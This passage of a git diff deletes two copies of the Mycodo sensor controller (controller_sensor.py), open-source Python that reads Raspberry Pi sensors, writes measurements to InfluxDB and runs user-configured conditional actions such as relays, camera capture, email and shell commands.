self.stop_iteration_counter: - self.stop_iteration_counter = 0 - except StopIteration: - self.stop_iteration_counter += 1 - # Notify after 3 consecutive errors. Prevents filling log - # with many one-off errors over long periods of time - if self.stop_iteration_counter > 2: - self.stop_iteration_counter = 0 - self.logger.error( - "StopIteration raised. Possibly could not read " - "sensor. Ensure it's connected properly and " - "detected.") - except Exception as except_msg: - self.logger.exception( - "Error while attempting to read sensor: {err}".format( - err=except_msg)) - - self.unlock_multiplexer() - - if self.device_recognized and measurements is not None: - self.measurement = Measurement(measurements) - self.updateSuccess = True - else: - self.updateSuccess = False - - self.lastUpdate = time.time() - - def setup_lock(self, i2c_address, i2c_bus, lockfile): - execution_timer = timeit.default_timer() - try: - self.lock[lockfile] = LockFile(lockfile) - while not self.lock[lockfile].i_am_locking(): - try: - self.logger.debug( - "[Locking bus-{bus} 0x{i2c:02X}] Acquiring Lock: " - "{lock}".format( - bus=i2c_bus, - i2c=i2c_address, - lock=self.lock[lockfile].path)) - # wait up to 60 seconds - self.lock[lockfile].acquire(timeout=60) - except Exception as e: - self.logger.error( - "{cls} raised an exception: {err}".format( - cls=type(self).__name__, err=e)) - self.logger.exception( - "[Locking bus-{bus} 0x{i2c:02X}] Waited 60 seconds. " - "Breaking lock to acquire {lock}".format( - bus=i2c_bus, - i2c=i2c_address, - lock=self.lock[lockfile].path)) - self.lock[lockfile].break_lock() - self.lock[lockfile].acquire() - self.logger.debug( - "[Locking bus-{bus} 0x{i2c:02X}] Acquired Lock: " - "{lock}".format( - bus=i2c_bus, - i2c=i2c_address, - lock=self.lock[lockfile].path)) - self.logger.debug( - "[Locking bus-{bus} 0x{i2c:02X}] Executed in {ms:.1f} ms".format( - bus=i2c_bus, - i2c=i2c_address, - ms=(timeit.default_timer()-execution_timer)*1000)) - return 1, "Success" - except Exception as msg: - return 0, "Multiplexer Fail: {}".format(msg) - - def release_lock(self, i2c_address, i2c_bus, lockfile): - self.logger.debug( - "[Locking bus-{bus} 0x{i2c:02X}] Releasing Lock: {lock}".format( - bus=i2c_bus, i2c=i2c_address, lock=lockfile)) - self.lock[lockfile].release() - - def get_last_measurement(self, measurement_type): - """ - Retrieve the latest sensor measurement - - :return: The latest sensor value or None if no data available - :rtype: float or None - - :param measurement_type: Environmental condition of a sensor (e.g. - temperature, humidity, pressure, etc.) - :type measurement_type: str - """ - last_measurement = read_last_influxdb( - self.unique_id, measurement_type, int(self.period * 1.5)) - - if last_measurement: - last_value = last_measurement[1] - return last_value - else: - return None - - def edge_detected(self, pin): - gpio_state = GPIO.input(int(self.location)) - if time.time() > self.edge_reset_timer: - self.edge_reset_timer = time.time()+self.switch_reset_period - if (self.switch_edge == 'rising' or - (self.switch_edge == 'both' and gpio_state)): - rising_or_falling = 1 # Rising edge detected - else: - rising_or_falling = -1 # Falling edge detected - write_db = threading.Thread( - target=write_influxdb_value, - args=(self.unique_id, 'edge', rising_or_falling,)) - write_db.start() - - # Check sensor conditionals - for each_cond_id in self.cond_id: - if ((self.cond_is_activated[each_cond_id] and - self.cond_if_sensor_edge_select[each_cond_id] == 'edge') and - ((self.cond_if_sensor_edge_detected[each_cond_id] == 'rising' and - rising_or_falling == 1) or - (self.cond_if_sensor_edge_detected[each_cond_id] == 'falling' and - rising_or_falling == -1) or - self.cond_if_sensor_edge_detected[each_cond_id] == 'both')): - self.check_conditionals(each_cond_id) - - def setup_sensor_conditionals(self, cond_mod='setup'): - # Signal to pause the main loop and wait for verification - self.pause_loop = True - while not self.verify_pause_loop: - time.sleep(0.1) - - self.cond_id = {} - self.cond_action_id = {} - self.cond_name = {} - self.cond_is_activated = {} - self.cond_if_sensor_period = {} - self.cond_if_sensor_measurement = {} - self.cond_if_sensor_edge_select = {} - self.cond_if_sensor_edge_detected = {} - self.cond_if_sensor_gpio_state = {} - self.cond_if_sensor_direction = {} - self.cond_if_sensor_setpoint = {} - - sensor_conditional = db_retrieve_table_daemon( - Conditional) - sensor_conditional = sensor_conditional.filter( - Conditional.sensor_id == self.sensor_id) - sensor_conditional = sensor_conditional.filter( - Conditional.is_activated == True).all() - - if cond_mod == 'setup': - self.cond_timer = {} - self.smtp_wait_timer = {} - elif cond_mod == 'add': - self.logger.debug("Added Conditional") - elif cond_mod == 'del': - self.logger.debug("Deleted Conditional") - elif cond_mod == 'mod': - self.logger.debug("Modified Conditional") - else: - return 1 - - for each_cond in sensor_conditional: - if cond_mod == 'setup': - self.logger.info( - "Activated Conditional ({id})".format(id=each_cond.id)) - self.cond_id[each_cond.id] = each_cond.id - self.cond_is_activated[each_cond.id] = each_cond.is_activated - self.cond_if_sensor_period[each_cond.id] = each_cond.if_sensor_period - self.cond_if_sensor_measurement[each_cond.id] = each_cond.if_sensor_measurement - self.cond_if_sensor_edge_select[each_cond.id] = each_cond.if_sensor_edge_select - self.cond_if_sensor_edge_detected[each_cond.id] = each_cond.if_sensor_edge_detected - self.cond_if_sensor_gpio_state[each_cond.id] = each_cond.if_sensor_gpio_state - self.cond_if_sensor_direction[each_cond.id] = each_cond.if_sensor_direction - self.cond_if_sensor_setpoint[each_cond.id] = each_cond.if_sensor_setpoint - self.cond_timer[each_cond.id] = time.time() + each_cond.if_sensor_period - self.smtp_wait_timer[each_cond.id] = time.time() + 3600 - - self.pause_loop = False - self.verify_pause_loop = False - - def is_running(self): - return self.running - - def stop_controller(self): - self.thread_shutdown_timer = timeit.default_timer() - if self.device not in ['EDGE', 'ADS1x15', 'MCP342x']: - self.measure_sensor.stop_sensor() - self.running = False diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.target.py deleted file mode 100644 index 5611ed9..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.target.py +++ /dev/null @@ -1,945 +0,0 @@ -# coding=utf-8 -# -# controller_sensor.py - Sensor controller that manages reading sensors and -# creating database entries -# -# Copyright (C) 2017 Kyle T. Gabriel -# -# This file is part of Mycodo -# -# Mycodo is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# Mycodo is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Mycodo. If not, see . -# -# Contact at kylegabriel.com - -import logging -import fasteners -import requests -import threading -import time -import timeit -import RPi.GPIO as GPIO - -from mycodo_client import DaemonControl -from databases.models import Camera -from databases.models import Conditional -from databases.models import ConditionalActions -from databases.models import PID -from databases.models import Relay -from databases.models import Sensor -from databases.models import SMTP - -from devices.tca9548a import TCA9548A -from devices.ads1x15 import ADS1x15Read -from devices.mcp342x import MCP342xRead -from sensors.mycodo_ram import MycodoRam -from sensors.atlas_ph import AtlaspHSensor -from sensors.atlas_pt1000 import AtlasPT1000Sensor -from sensors.am2315 import AM2315Sensor -from sensors.bh1750 import BH1750Sensor -from sensors.bme280 import BME280Sensor -from sensors.bmp180 import BMP180Sensor -from sensors.bmp280 import BMP280Sensor -from sensors.chirp import ChirpSensor -from sensors.dht11 import DHT11Sensor -from sensors.dht22 import DHT22Sensor -from sensors.ds18b20 import DS18B20Sensor -from sensors.htu21d import HTU21DSensor -from sensors.k30 import K30Sensor -from sensors.linux_command import LinuxCommand -from sensors.mh_z16 import MHZ16Sensor -from sensors.mh_z19 import MHZ19Sensor -from sensors.raspi import RaspberryPiCPUTemp -from sensors.raspi_cpuload import RaspberryPiCPULoad -from sensors.raspi_freespace import RaspberryPiFreeSpace -from sensors.tmp006 import TMP006Sensor -from sensors.tsl2561 import TSL2561Sensor -from sensors.tsl2591_sensor import TSL2591Sensor -from sensors.sht1x_7x import SHT1x7xSensor -from sensors.sht2x import SHT2xSensor -from sensors.signal_pwm import PWMInput -from sensors.signal_rpm import RPMInput - -from devices.camera import camera_record -from utils.database import db_retrieve_table_daemon -from utils.influx import format_influxdb_data -from utils.influx import read_last_influxdb -from utils.influx import write_influxdb_list -from utils.influx import write_influxdb_value -from utils.send_data import send_email -from utils.system_pi import cmd_output - -from config import LIST_DEVICES_I2C - - -class Measurement: - """ - Class for holding all measurement values in a dictionary. - The dictionary is formatted in the following way: - - {'measurement type':measurement value} - - Measurement type: The environmental or physical condition - being measured, such as 'temperature', or 'pressure'. - - Measurement value: The actual measurement of the condition. - """ - - def __init__(self, raw_data): - self.rawData = raw_data - - @property - def values(self): - return self.rawData - - -class SensorController(threading.Thread): - """ - Class for controlling the sensor - - """ - def __init__(self, ready, sensor_id): - threading.Thread.__init__(self) - - self.logger = logging.getLogger( - "mycodo.sensor_{id}".format(id=sensor_id)) - - self.stop_iteration_counter = 0 - self.thread_startup_timer = timeit.default_timer() - self.thread_shutdown_timer = 0 - self.ready = ready - self.lock = {} - self.measurement = None - self.updateSuccess = False - self.sensor_id = sensor_id - self.control = DaemonControl() - self.pause_loop = False - self.verify_pause_loop = True - - self.cond_id = {} - self.cond_action_id = {} - self.cond_name = {} - self.cond_is_activated = {} - self.cond_if_sensor_period = {} - self.cond_if_sensor_measurement = {} - self.cond_if_sensor_edge_select = {} - self.cond_if_sensor_edge_detected = {} - self.cond_if_sensor_gpio_state = {} - self.cond_if_sensor_direction = {} - self.cond_if_sensor_setpoint = {} - self.cond_do_relay_id = {} - self.cond_do_relay_state = {} - self.cond_do_relay_duration = {} - self.cond_execute_command = {} - self.cond_email_notify = {} - self.cond_do_lcd_id = {} - self.cond_do_camera_id = {} - self.cond_timer = {} - self.smtp_wait_timer = {} - - self.setup_sensor_conditionals() - - sensor = db_retrieve_table_daemon(Sensor, device_id=self.sensor_id) - self.sensor_sel = sensor - self.unique_id = sensor.unique_id - self.i2c_bus = sensor.i2c_bus - self.location = sensor.location - self.power_relay_id = sensor.power_relay_id - self.measurements = sensor.measurements - self.device = sensor.device - self.interface = sensor.interface - self.device_loc = sensor.device_loc - self.baud_rate = sensor.baud_rate - self.period = sensor.period - self.resolution = sensor.resolution - self.sensitivity = sensor.sensitivity - self.cmd_command = sensor.cmd_command - self.cmd_measurement = sensor.cmd_measurement - self.cmd_measurement_units = sensor.cmd_measurement_units - self.mux_address_raw = sensor.multiplexer_address - self.mux_bus = sensor.multiplexer_bus - self.mux_chan = sensor.multiplexer_channel - self.adc_chan = sensor.adc_channel - self.adc_gain = sensor.adc_gain - self.adc_resolution = sensor.adc_resolution - self.adc_measure = sensor.adc_measure - self.adc_measure_units = sensor.adc_measure_units - self.adc_volts_min = sensor.adc_volts_min - self.adc_volts_max = sensor.adc_volts_max - self.adc_units_min = sensor.adc_units_min - self.adc_units_max = sensor.adc_units_max - self.adc_inverse_unit_scale = sensor.adc_inverse_unit_scale - self.sht_clock_pin = sensor.sht_clock_pin - self.sht_voltage = sensor.sht_voltage - - # Edge detection - self.switch_edge = sensor.switch_edge - self.switch_bouncetime = sensor.switch_bouncetime - self.switch_reset_period = sensor.switch_reset_period - - # PWM and RPM options - self.weighting = sensor.weighting - self.rpm_pulses_per_rev = sensor.rpm_pulses_per_rev - self.sample_time = sensor.sample_time - - # Relay that will activate prior to sensor read - self.pre_relay_id = sensor.pre_relay_id - self.pre_relay_duration = sensor.pre_relay_duration - self.pre_relay_setup = False - self.next_measurement = time.time() - self.get_new_measurement = False - self.trigger_cond = False - self.measurement_acquired = False - self.pre_relay_activated = False - self.pre_relay_timer = time.time() - - relay = db_retrieve_table_daemon(Relay, entry='all') - for each_relay in relay: # Check if relay ID actually exists - if each_relay.id == self.pre_relay_id and self.pre_relay_duration: - self.pre_relay_setup = True - - smtp = db_retrieve_table_daemon(SMTP, entry='first') - self.smtp_max_count = smtp.hourly_max - self.email_count = 0 - self.allowed_to_send_notice = True - - # Convert string I2C address to base-16 int - if self.device in LIST_DEVICES_I2C: - self.i2c_address = int(str(self.location), 16) - - # Set up multiplexer if enabled - if self.device in LIST_DEVICES_I2C and self.mux_address_raw: - self.mux_address_string = self.mux_address_raw - self.mux_address = int(str(self.mux_address_raw), 16) - self.mux_lock = "/var/lock/mycodo_multiplexer_0x{i2c:02X}.pid".format( - i2c=self.mux_address) - self.mux_lock = fasteners.InterProcessLock(self.mux_lock) - self.mux_lock_acquired = False - self.multiplexer = TCA9548A(self.mux_bus, self.mux_address) - else: - self.multiplexer = None - - if self.device in ['ADS1x15', 'MCP342x'] and self.location: - self.adc_lock_file = "/var/lock/mycodo_adc_bus{bus}_0x{i2c:02X}.pid".format( - bus=self.i2c_bus, i2c=self.i2c_address) - - # Set up edge detection of a GPIO pin - if self.device == 'EDGE': - if self.switch_edge == 'rising': - self.switch_edge_gpio = GPIO.RISING - elif self.switch_edge == 'falling': - self.switch_edge_gpio = GPIO.FALLING - else: - self.switch_edge_gpio = GPIO.BOTH - - # Lock multiplexer, if it's enabled - if self.multiplexer: - self.lock_multiplexer() - - # Set up analog-to-digital converter - if self.device == 'ADS1x15': - self.adc = ADS1x15Read(self.i2c_address, self.i2c_bus, - self.adc_chan, self.adc_gain) - elif self.device == 'MCP342x': - self.adc = MCP342xRead(self.i2c_address, self.i2c_bus, - self.adc_chan, self.adc_gain, - self.adc_resolution) - else: - self.adc = None - - self.device_recognized = True - - # Set up sensors or devices - if self.device in ['EDGE', 'ADS1x15', 'MCP342x']: - self.measure_sensor = None - elif self.device == 'MYCODO_RAM': - self.measure_sensor = MycodoRam() - elif self.device == 'RPiCPULoad': - self.measure_sensor = RaspberryPiCPULoad() - elif self.device == 'RPi': - self.measure_sensor = RaspberryPiCPUTemp() - elif self.device == 'RPiFreeSpace': - self.measure_sensor = RaspberryPiFreeSpace(self.location) - elif self.device == 'AM2302': - self.measure_sensor = DHT22Sensor(self.sensor_id, - int(self.location)) - elif self.device == 'AM2315': - self.measure_sensor = AM2315Sensor(self.sensor_id, - self.i2c_bus, - power=self.power_relay_id) - elif self.device == 'ATLAS_PH_I2C': - self.measure_sensor = AtlaspHSensor(self.interface, - i2c_address=self.i2c_address, - i2c_bus=self.i2c_bus, - sensor_sel=self.sensor_sel) - elif self.device == 'ATLAS_PH_UART': - self.measure_sensor = AtlaspHSensor(self.interface, - device_loc=self.device_loc, - baud_rate=self.baud_rate, - sensor_sel=self.sensor_sel) - elif self.device == 'ATLAS_PT1000_I2C': - self.measure_sensor = AtlasPT1000Sensor(self.interface, - i2c_address=self.i2c_address, - i2c_bus=self.i2c_bus) - elif self.device == 'ATLAS_PT1000_UART': - self.measure_sensor = AtlasPT1000Sensor(self.interface, - device_loc=self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'BH1750': - self.measure_sensor = BH1750Sensor(self.i2c_address, - self.i2c_bus, - self.resolution, - self.sensitivity) - elif self.device == 'BME280': - self.measure_sensor = BME280Sensor(self.i2c_address, - self.i2c_bus) - # TODO: BMP is an old designation and will be removed in the future - elif self.device in ['BMP', 'BMP180']: - self.measure_sensor = BMP180Sensor(self.i2c_bus) - elif self.device == 'BMP280': - self.measure_sensor = BMP280Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'CHIRP': - self.measure_sensor = ChirpSensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'DS18B20': - self.measure_sensor = DS18B20Sensor(self.location) - elif self.device == 'DHT11': - self.measure_sensor = DHT11Sensor(self.sensor_id, - int(self.location), - power=self.power_relay_id) - elif self.device == 'DHT22': - self.measure_sensor = DHT22Sensor(self.sensor_id, - int(self.location), - power=self.power_relay_id) - elif self.device == 'HTU21D': - self.measure_sensor = HTU21DSensor(self.i2c_bus) - elif self.device == 'K30_UART': - self.measure_sensor = K30Sensor(self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'MH_Z16_I2C': - self.measure_sensor = MHZ16Sensor(self.interface, - i2c_address=self.i2c_address, - i2c_bus=self.i2c_bus) - elif self.device == 'MH_Z16_UART': - self.measure_sensor = MHZ16Sensor(self.interface, - device_loc=self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'MH_Z19_UART': - self.measure_sensor = MHZ19Sensor(self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'SHT1x_7x': - self.measure_sensor = SHT1x7xSensor(int(self.location), - self.sht_clock_pin, - self.sht_voltage) - elif self.device == 'SHT2x': - self.measure_sensor = SHT2xSensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'SIGNAL_PWM': - self.measure_sensor = PWMInput(int(self.location), - self.weighting, - self.sample_time) - elif self.device == 'SIGNAL_RPM': - self.measure_sensor = RPMInput(int(self.location), - self.weighting, - self.rpm_pulses_per_rev, - self.sample_time) - elif self.device == 'TMP006': - self.measure_sensor = TMP006Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'TSL2561': - self.measure_sensor = TSL2561Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'TSL2591': - self.measure_sensor = TSL2591Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'LinuxCommand': - self.measure_sensor = LinuxCommand(self.cmd_command, - self.cmd_measurement) - else: - self.device_recognized = False - self.logger.debug("Device '{device}' not recognized".format( - device=self.device)) - raise Exception("'{device}' is not a valid device type.".format( - device=self.device)) - - if self.multiplexer: - self.unlock_multiplexer() - - self.edge_reset_timer = time.time() - self.sensor_timer = time.time() - self.running = False - self.lastUpdate = None - - def run(self): - try: - self.running = True - self.logger.info("Activated in {:.1f} ms".format( - (timeit.default_timer() - self.thread_startup_timer) * 1000)) - self.ready.set() - - # Set up edge detection - if self.device == 'EDGE': - GPIO.setmode(GPIO.BCM) - GPIO.setup(int(self.location), GPIO.IN) - GPIO.add_event_detect(int(self.location), - self.switch_edge_gpio, - callback=self.edge_detected, - bouncetime=self.switch_bouncetime) - - while self.running: - # Pause loop to modify conditional statements. - # Prevents execution of conditional while variables are - # being modified. - if self.pause_loop: - self.verify_pause_loop = True - while self.pause_loop: - time.sleep(0.1) - - if self.device not in ['EDGE']: - # Signal that a measurement needs to be obtained - if time.time() > self.next_measurement and not self.get_new_measurement: - self.get_new_measurement = True - self.trigger_cond = True - self.next_measurement = time.time() + self.period - - # if signaled and a pre relay is set up correctly, turn the - # relay on for the set duration - if (self.get_new_measurement and - self.pre_relay_setup and - not self.pre_relay_activated): - relay_on = threading.Thread( - target=self.control.relay_on, - args=(self.pre_relay_id, - self.pre_relay_duration,)) - relay_on.start() - self.pre_relay_activated = True - self.pre_relay_timer = time.time() + self.pre_relay_duration - - # If using a pre relay, wait for it to complete before - # querying the sensor for a measurement - if self.get_new_measurement: - if ((self.pre_relay_setup and - self.pre_relay_activated and - time.time() < self.pre_relay_timer) or - not self.pre_relay_setup): - # Get measurement(s) from sensor - self.update_measure() - # Add measurement(s) to influxdb - self.add_measure_influxdb() - self.pre_relay_activated = False - self.get_new_measurement = False - - for each_cond_id in self.cond_id: - if self.cond_is_activated[each_cond_id]: - # Check sensor conditional if it has been activated - if (self.device in ['EDGE'] and - self.cond_if_sensor_edge_select[each_cond_id] == 'state' and - time.time() > self.cond_timer[each_cond_id]): - # Inputs that are triggered (switch, reed, hall, etc.) - self.cond_timer[each_cond_id] = time.time() + self.cond_if_sensor_period[each_cond_id] - self.check_conditionals(each_cond_id) - elif ((not self.cond_timer[each_cond_id] and self.trigger_cond) or - time.time() > self.cond_timer[each_cond_id]): - # Inputs that are not triggered (sensors) - self.cond_timer[each_cond_id] = time.time() + self.cond_if_sensor_period[each_cond_id] - self.check_conditionals(each_cond_id) - - self.trigger_cond = False - - time.sleep(0.1) - - self.running = False - - if self.device == 'EDGE': - GPIO.setmode(GPIO.BCM) - GPIO.cleanup(int(self.location)) - - self.logger.info("Deactivated in {:.1f} ms".format( - (timeit.default_timer() - self.thread_shutdown_timer) * 1000)) - except requests.ConnectionError: - self.logger.error("Could not connect to influxdb. Check that it " - "is running and accepting connections") - except Exception as except_msg: - self.logger.exception("Error: {err}".format( - err=except_msg)) - - def add_measure_influxdb(self): - """ - Add a measurement entries to InfluxDB - - :rtype: None - """ - if self.updateSuccess: - data = [] - for each_measurement, each_value in self.measurement.values.items(): - data.append(format_influxdb_data(self.unique_id, - each_measurement, - each_value)) - write_db = threading.Thread( - target=write_influxdb_list, - args=(data,)) - write_db.start() - - def check_conditionals(self, cond_id): - """ - Check if any sensor conditional statements are activated and - execute their actions if the conditional is true. - - For example, if measured temperature is above 30C, notify me@gmail.com - - :rtype: None - - :param cond_id: ID of conditional to check - :type cond_id: str - """ - logger_cond = logging.getLogger("mycodo.sensor_cond_{id}".format( - id=cond_id)) - attachment_file = False - attachment_type = False - - cond = db_retrieve_table_daemon( - Conditional, device_id=cond_id, entry='first') - - message = u"[Sensor Conditional: {name} ({id})]".format( - name=cond.name, - id=cond_id) - - if cond.if_sensor_direction: - last_measurement = self.get_last_measurement( - cond.if_sensor_measurement) - if (last_measurement and - ((cond.if_sensor_direction == 'above' and - last_measurement > cond.if_sensor_setpoint) or - (cond.if_sensor_direction == 'below' and - last_measurement < cond.if_sensor_setpoint))): - - message += u" {meas}: {value} ".format( - meas=cond.if_sensor_measurement, - value=last_measurement) - if cond.if_sensor_direction == 'above': - message += "(>" - elif cond.if_sensor_direction == 'below': - message += "(<" - message += u" {sp} set value).".format( - sp=cond.if_sensor_setpoint) - else: - logger_cond.debug("Last measurement not found") - return 1 - elif cond.if_sensor_edge_detected: - if cond.if_sensor_edge_select == 'edge': - message += u" {edge} Edge Detected.".format( - edge=cond.if_sensor_edge_detected) - elif cond.if_sensor_edge_select == 'state': - if GPIO.input(int(self.location)) == cond.if_sensor_gpio_state: - message += u" {state} GPIO State Detected.".format( - state=cond.if_sensor_gpio_state) - else: - return 0 - - cond_actions = db_retrieve_table_daemon(ConditionalActions) - cond_actions = cond_actions.filter( - ConditionalActions.conditional_id == cond_id).all() - - for cond_action in cond_actions: - message += u" Conditional Action ({id}): {do_action}.".format( - id=cond_action.id, do_action=cond_action.do_action) - - # Actuate relay - if (cond_action.do_relay_id and - cond_action.do_relay_state in ['on', 'off']): - message += u" Turn relay {id} {state}".format( - id=cond_action.do_relay_id, - state=cond_action.do_relay_state) - if (cond_action.do_relay_state == 'on' and - cond_action.do_relay_duration): - message += u" for {sec} seconds".format( - sec=cond_action.do_relay_duration) - message += "." - relay_on_off = threading.Thread( - target=self.control.relay_on_off, - args=(cond_action.do_relay_id, - cond_action.do_relay_state,), - kwargs={'duration': cond_action.do_relay_duration}) - relay_on_off.start() - - # Execute command in shell - elif cond_action.do_action == 'command': - message += u" Execute '{com}' ".format( - com=cond_action.do_action_string) - - command_str = cond_action.do_action_string - for each_measurement, each_value in self.measurement.values.items(): - command_str = command_str.replace( - "((input_{var}))".format(var=each_measurement), str(each_value)) - command_str = command_str.replace( - "((input_location))", str(self.location)) - command_str = command_str.replace( - "((input_period))", str(self.cond_if_sensor_period[cond_id])) - _, _, cmd_status = cmd_output(command_str) - - message += u"(Status: {stat}).".format(stat=cmd_status) - - # Capture photo - elif cond_action.do_action in ['photo', 'photo_email']: - message += u" Capturing photo with camera ({id}).".format( - id=cond_action.do_camera_id) - camera_still = db_retrieve_table_daemon( - Camera, device_id=cond_action.do_camera_id) - attachment_file = camera_record('photo', camera_still) - - # Capture video - elif cond_action.do_action in ['video', 'video_email']: - message += u" Capturing video with camera ({id}).".format( - id=cond_action.do_camera_id) - camera_stream = db_retrieve_table_daemon( - Camera, device_id=cond_action.do_camera_id) - attachment_file = camera_record( - 'video', camera_stream, - duration_sec=cond_action.do_camera_duration) - - # Activate PID controller - elif cond_action.do_action == 'activate_pid': - message += u" Activate PID ({id}).".format( - id=cond_action.do_pid_id) - pid = db_retrieve_table_daemon( - PID, device_id=cond_action.do_pid_id, entry='first') - if pid.is_activated: - message += u" Notice: PID is already active!" - else: - activate_pid = threading.Thread( - target=self.control.controller_activate, - args=('PID', - cond_action.do_pid_id,)) - activate_pid.start() - - # Deactivate PID controller - elif cond_action.do_action == 'deactivate_pid': - message += u" Deactivate PID ({id}).".format( - id=cond_action.do_pid_id) - pid = db_retrieve_table_daemon( - PID, device_id=cond_action.do_pid_id, entry='first') - if not pid.is_activated: - message += u" Notice: PID is already inactive!" - else: - deactivate_pid = threading.Thread( - target=self.control.controller_deactivate, - args=('PID', - cond_action.do_pid_id,)) - deactivate_pid.start() - - elif cond_action.do_action in ['email', - 'photo_email', - 'video_email']: - if (self.email_count >= self.smtp_max_count and - time.time() < self.smtp_wait_timer[cond_id]): - self.allowed_to_send_notice = False - else: - if time.time() > self.smtp_wait_timer[cond_id]: - self.email_count = 0 - self.smtp_wait_timer[cond_id] = time.time() + 3600 - self.allowed_to_send_notice = True - self.email_count += 1 - - # If the emails per hour limit has not been exceeded - if self.allowed_to_send_notice: - message += u" Notify {email}.".format( - email=cond_action.do_action_string) - # attachment_type != False indicates to - # attach a photo or video - if cond_action.do_action == 'photo_email': - message += u" Photo attached to email." - attachment_type = 'still' - elif cond_action.do_action == 'video_email': - message += u" Video attached to email." - attachment_type = 'video' - - smtp = db_retrieve_table_daemon(SMTP, entry='first') - send_email(smtp.host, smtp.ssl, smtp.port, - smtp.user, smtp.passw, smtp.email_from, - cond_action.do_action_string, message, - attachment_file, attachment_type) - else: - logger_cond.debug( - "Wait {sec:.0f} seconds to email again.".format( - sec=self.smtp_wait_timer[cond_id]-time.time())) - - elif cond_action.do_action == 'flash_lcd': - message += u" Flashing LCD ({id}).".format( - id=cond_action.do_lcd_id) - start_flashing = threading.Thread( - target=self.control.flash_lcd, - args=(cond_action.do_lcd_id, 1,)) - start_flashing.start() - - logger_cond.debug(message) - - def lock_multiplexer(self): - """ Acquire a multiplexer lock """ - self.mux_lock_acquired = False - - for i in range(600): - self.mux_lock_acquired = self.mux_lock.acquire(blocking=False) - if self.mux_lock_acquired: - break - else: - time.sleep(0.1) - - if not self.mux_lock_acquired: - self.logger.error( - "Unable to acquire lock: {lock}".format(lock=self.mux_lock)) - - self.logger.debug( - "Setting multiplexer ({add}) to channel {chan}".format( - add=self.mux_address_string, - chan=self.mux_chan)) - - # Set multiplexer channel - (multiplexer_status, - multiplexer_response) = self.multiplexer.setup(self.mux_chan) - - if not multiplexer_status: - self.logger.warning( - "Could not set channel with multiplexer at address {add}." - " Error: {err}".format( - add=self.mux_address_string, - err=multiplexer_response)) - self.updateSuccess = False - return 1 - - def unlock_multiplexer(self): - """ Remove a multiplexer lock """ - if self.mux_lock and self.mux_lock_acquired: - self.mux_lock.release() - - def read_adc(self, measurements): - """ Read voltage from ADC """ - try: - gotten = False - adc_lock = fasteners.InterProcessLock(self.adc_lock_file) - for i in range(600): - gotten = adc_lock.acquire(blocking=False) - if gotten: - break - else: - time.sleep(0.1) - if not gotten: - self.logger.error( - "Unable to acquire lock: {lock}".format( - lock=self.adc_lock_file)) - - # Get measurement from ADC - measurements = self.adc.next() - if measurements is not None: - # Get the voltage difference between min and max volts - diff_voltage = abs(self.adc_volts_max - self.adc_volts_min) - # Ensure the voltage stays within the min/max bounds - if measurements['voltage'] < self.adc_volts_min: - measured_voltage = self.adc_volts_min - elif measurements['voltage'] > self.adc_volts_max: - measured_voltage = self.adc_volts_max - else: - measured_voltage = measurements['voltage'] - # Calculate the percentage of the voltage difference - percent_diff = ((measured_voltage - self.adc_volts_min) / - diff_voltage) - - # Get the units difference between min and max units - diff_units = abs(self.adc_units_max - self.adc_units_min) - # Calculate the measured units from the percent difference - if self.adc_inverse_unit_scale: - converted_units = (self.adc_units_max - - (diff_units * percent_diff)) - else: - converted_units = (self.adc_units_min + - (diff_units * percent_diff)) - # Ensure the units stay within the min/max bounds - if converted_units < self.adc_units_min: - measurements[self.adc_measure] = self.adc_units_min - elif converted_units > self.adc_units_max: - measurements[self.adc_measure] = self.adc_units_max - else: - measurements[self.adc_measure] = converted_units - - if adc_lock and gotten: - adc_lock.release() - - except Exception as except_msg: - self.logger.exception( - "Error while attempting to read adc: {err}".format( - err=except_msg)) - return measurements - - def update_measure(self): - """ - Retrieve measurement from sensor - - :return: None if success, 0 if fail - :rtype: int or None - """ - measurements = None - - if not self.device_recognized: - self.logger.debug("Device not recognized: {device}".format( - device=self.device)) - self.updateSuccess = False - return 1 - - # Lock multiplexer, if it's enabled - if self.multiplexer: - self.lock_multiplexer() - - if self.adc: - measurements = self.read_adc(measurements) - else: - try: - # Get measurement from sensor - measurements = self.measure_sensor.next() - # Reset StopIteration counter on successful read - if self.stop_iteration_counter: - self.stop_iteration_counter = 0 - except StopIteration: - self.stop_iteration_counter += 1 - # Notify after 3 consecutive errors. Prevents filling log - # with many one-off errors over long periods of time - if self.stop_iteration_counter > 2: - self.stop_iteration_counter = 0 - self.logger.error( - "StopIteration raised. Possibly could not read " - "sensor. Ensure it's connected properly and " - "detected.") - except Exception as except_msg: - self.logger.exception( - "Error while attempting to read sensor: {err}".format( - err=except_msg)) - - if self.multiplexer: - self.unlock_multiplexer() - - if self.device_recognized and measurements is not None: - self.measurement = Measurement(measurements) - self.updateSuccess = True - else: - self.updateSuccess = False - - self.lastUpdate = time.time() - - def get_last_measurement(self, measurement_type): - """ - Retrieve the latest sensor measurement - - :return: The latest sensor value or None if no data available - :rtype: float or None - - :param measurement_type: Environmental condition of a sensor (e.g. - temperature, humidity, pressure, etc.) - :type measurement_type: str - """ - last_measurement = read_last_influxdb( - self.unique_id, measurement_type, int(self.period * 1.5)) - - if last_measurement: - last_value = last_measurement[1] - return last_value - else: - return None - - def edge_detected(self, pin): - gpio_state = GPIO.input(int(self.location)) - if time.time() > self.edge_reset_timer: - self.edge_reset_timer = time.time()+self.switch_reset_period - if (self.switch_edge == 'rising' or - (self.switch_edge == 'both' and gpio_state)): - rising_or_falling = 1 # Rising edge detected - else: - rising_or_falling = -1 # Falling edge detected - write_db = threading.Thread( - 